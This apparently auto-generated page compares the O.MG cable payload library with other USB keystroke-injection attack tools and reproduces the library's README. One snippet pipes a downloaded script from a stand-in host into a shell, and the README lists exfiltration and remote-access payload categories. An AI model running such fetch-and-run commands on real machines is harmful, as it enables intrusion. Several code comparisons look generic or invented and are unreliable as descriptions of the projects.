omg-payloads
Official payload library for the O.MG line of products from Mischief Gadgets
Top Related Projects
USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.
P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W.
Wireless keystroke injection attack platform
WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.
Quick Overview
Error generating quick overview
Competitor Comparisons
USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.
Pros of usbdriveby
- Focused on a specific attack vector (USB-based attacks)
- Lightweight and easy to understand for beginners
- Includes a detailed explanation of the attack process
Cons of usbdriveby
- Limited payload options compared to omg-payloads
- Less frequently updated and maintained
- Lacks cross-platform compatibility
Code Comparison
usbdriveby:
import time
import subprocess
def run_command(command):
subprocess.call(command, shell=True)
run_command("osascript -e 'tell application \"Terminal\" to do script \"curl http://example.com/payload | sh\"'")
time.sleep(1)
run_command("osascript -e 'tell application \"Terminal\" to close (every window whose name contains \"bash\")'")
omg-payloads:
import sys
import usb.core
import usb.util
dev = usb.core.find(idVendor=0x1d6b, idProduct=0x0002)
if dev is None:
sys.exit("Device not found")
dev.set_configuration()
The usbdriveby code focuses on executing commands on macOS using AppleScript, while omg-payloads demonstrates USB device interaction using the PyUSB library. omg-payloads offers a broader range of payload options and is more versatile across different platforms and attack scenarios.
P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
Pros of P4wnP1_aloa
- More versatile and customizable, supporting a wider range of hardware platforms
- Offers a web-based interface for easier configuration and management
- Provides more advanced scripting capabilities with bash and Python support
Cons of P4wnP1_aloa
- Steeper learning curve due to its more complex features and setup process
- Less frequent updates and potentially less community support
- May require additional hardware or setup compared to OMG-payloads
Code Comparison
P4wnP1_aloa (Python script example):
from pwnlib import *
def run():
led.blink(500)
keyboard.type("Hello from P4wnP1!")
usb_gadget.set_mode("hid")
OMG-payloads (DuckyScript example):
DELAY 1000
LED 0 255 0
STRING Hello from OMG!
ENTER
Both repositories offer payload scripts for USB attack devices, but P4wnP1_aloa provides more advanced scripting options with full programming language support, while OMG-payloads focuses on simpler, more accessible DuckyScript payloads. P4wnP1_aloa is better suited for advanced users and complex scenarios, while OMG-payloads is more user-friendly for quick and straightforward attacks.
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W.
Pros of P4wnP1
- More versatile and customizable, supporting a wider range of attack scenarios
- Built-in web interface for easier configuration and management
- Supports multiple USB gadget modes, including RNDIS, ECM, and HID
Cons of P4wnP1
- Steeper learning curve due to its more complex features
- Less frequently updated compared to OMG-Payloads
- Requires more hardware setup and configuration
Code Comparison
P4wnP1:
# Example of USB gadget setup
USB_GADGET = {
"idVendor": "0x1d6b",
"idProduct": "0x0104",
"bcdDevice": "0x0100",
"bcdUSB": "0x0200",
}
OMG-Payloads:
REM Example of a simple payload
DELAY 1000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 1000
STRING Hello from OMG!
The P4wnP1 code snippet demonstrates its advanced USB gadget configuration capabilities, while the OMG-Payloads example shows a simpler DuckyScript payload format. P4wnP1 offers more low-level control and customization, whereas OMG-Payloads focuses on ease of use and quick payload creation.
Wireless keystroke injection attack platform
Pros of WiFiDuck
- Open-source and community-driven development
- Supports both USB and Wi-Fi connectivity
- Customizable firmware for advanced users
Cons of WiFiDuck
- Limited pre-built payload library compared to OMG Payloads
- May require more technical knowledge to set up and use effectively
- Less frequent updates and maintenance
Code Comparison
WiFiDuck example payload:
layout("us");
typingSpeed(0);
delay(1000);
println("Hello World!");
OMG Payloads example payload:
DELAY 1000
LAYOUT US
STRINGLN Hello World!
Both repositories offer similar functionality for creating and executing payloads on USB rubber ducky-like devices. WiFiDuck provides a more flexible platform with Wi-Fi capabilities, while OMG Payloads offers a larger collection of ready-to-use payloads and benefits from Hak5's extensive ecosystem. The choice between the two depends on the user's specific needs, technical expertise, and desired features.
WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.
Pros of WHID
- Open-source and community-driven, allowing for more customization and contributions
- Supports a wider range of hardware platforms, including ESP8266 and ESP32
- Offers more advanced features like wireless connectivity and remote payload execution
Cons of WHID
- Less polished user interface and documentation compared to OMG-payloads
- Smaller community and fewer pre-built payloads available
- May require more technical knowledge to set up and use effectively
Code Comparison
WHID example payload:
#include <DigiKeyboard.h>
void setup() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.println("echo Hello, WHID!");
}
void loop() {}
OMG-payloads example payload:
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
keyboard = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(keyboard)
layout.write("echo Hello, OMG!")
Both repositories focus on creating and executing payloads for USB rubber ducky-style attacks. WHID offers more flexibility and advanced features but may require more technical expertise. OMG-payloads provides a more user-friendly experience with a larger collection of pre-built payloads. The code examples demonstrate the different programming languages and approaches used by each project.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Payload Library for O.MG Devices
This repository contains payloads and extensions for O.MG Devices. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
About the O.MG Cable
To get a cable like this, you used to need a million dollar budget or to find a guy named MG at DEFCON. But Hak5 teamed up with MG to allow more people access to this previously clandestine attack hardware.
Documentation
Documentation on developing payloads for the OMG Cable can be found on the OMG Wiki.
Disclaimer
Generally, payloads may execute commands on your device or target. As such, it is possible for a payload to damage your device or target. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
Contributing
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.
Naming Conventions
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with - or _ used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
Comments
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
REM Title: FTP Exfiltrator
REM Description: Exfiltrates files from %userprofile%\documents via FTP
REM Author: Hak5Darren
REM Target: Windows XP SP3 - Latest
Top Related Projects
USBdriveby exploits the trust of USB devices by emulating an HID keyboard and mouse, installing a cross-platform firewall-evading backdoor, and rerouting DNS within seconds of plugging it in.
P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W.
Wireless keystroke injection attack platform
WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot